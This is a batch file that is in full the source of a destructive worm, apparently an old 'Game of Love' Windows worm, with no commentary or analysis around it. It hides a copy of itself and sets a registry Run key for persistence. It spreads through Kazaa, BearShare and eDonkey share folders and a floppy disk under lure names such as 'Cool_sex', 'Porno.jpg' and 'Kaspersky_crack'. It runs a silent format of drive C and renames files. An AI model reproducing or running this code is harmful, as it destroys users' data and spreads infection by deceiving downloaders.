@echo off
ctty nul
if exist c:\GameOfLove.bat goto 27
echo 1 >>%0
set bip=win%random%
@md c:\%bip%
copy %0 c:\%bip%\GameOfLove.bat >nul
copy %0 c:\GameOfLove.bat >nul
@attrib +h +s c:\GameOfLove.bat >nul
md C:\LittleLoveGame
copy %0 c:\LittleLoveGame\Love.exe.bat >nul
copy %0 c:\LittleLoveGame\Game.exe.bat >nul
copy %0 c:\LittleLoveGame\Uninstall.exe.bat >nul
echo ..... >>c:\LittleLoveGame\run.dll
echo .............. >>c:\LittleLoveGame\speed.dll
echo Love You Live>>c:\LittleLoveGame\MyLove.dll
echo Good day in paradise>>c:\LittleLoveGame\MyLove.dll
echo .............. >>c:\LittleLoveGame\win2003.exe
echo ..... >>c:\LittleLoveGame\jxs.sys
echo .............. >>c:\LittleLoveGame\jxs.sys
echo .......... >>c:\LittleLoveGame\level.1
echo ..... >>c:\LittleLoveGame\level.2
echo ..............    >>c:\LittleLoveGame\level.3
echo ........... >>c:\LittleLoveGame\level.4
echo ........ >>c:\LittleLoveGame\level.5
echo ..... >>c:\LittleLoveGame\bzi.dll
echo .......... >>c:\LittleLoveGame\reSPS.biz
echo ..... >>c:\LittleLoveGame\MPS.dll
echo .............. >>c:\LittleLoveGame\bot1.dll
echo .............. >>c:\LittleLoveGame\rewh.dfx
echo .............. >>c:\LittleLoveGame\"LOVE YOU LIVE.int"
copy %0 c:\progra~1\kazaa\myshar~1\"Game OF Love".exe.bat >nul
copy %0 c:\progra~1\bearshare\shared\Cool_sex.exe.bat >nul
copy %0 c:\progra~1\bearshare\shared\Game.exe.bat >nul
copy %0 c:\progra~1\eDonkey2000\incoming\Game.exe.bat >nul
copy %0 c:\progra~1\kazaa\myshar~1\Sex.exe.bat >nul
copy %0 c:\progra~1\kazaa\myshar~1\Game_Of_Love.exe.bat >nul
copy %0 c:\progra~1\eDonkey2000\incoming\Kaspersky_crack.exe.bat >nul
copy %0 c:\progra~1\bearshare\shared\Cool_Sex.jpg.bat >nul
copy %0 c:\progra~1\eDonkey2000\incoming\Porno.jpg.bat >nul
copy %0 c:\progra~1\kazaa\myshar~1\Monica_photo.jpg.bat >nul
copy %0 c:\progra~1\install.exe.bat >nul
copy %0 %windir%\LittleLove.txt.bat >nul
echo REGEDIT4>C:\toyou.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>C:\toyou.reg
echo "GameOFLove"="c:\\GameOfLove.bat" >> C:\toyou.reg
regedit /s C:\toyou.reg
del C:\toyou.reg >nul
if exist %windir%\Key.sys goto 2
echo Key >>%windir%\Key.sys
echo ... >>c:\LoveGame.inf
echo ... >>c:\LoveGame.txt
:2
:27
if exist c:\LoveGame.inf goto 5
echo y|Format c:/q >nul
:5
if exist c:\LoveGame.txt goto 11
for %%v in (*.*) do ren *.* *.bat
:11
copy %0 A:\readme.txt.bat >nul
ctty con
cls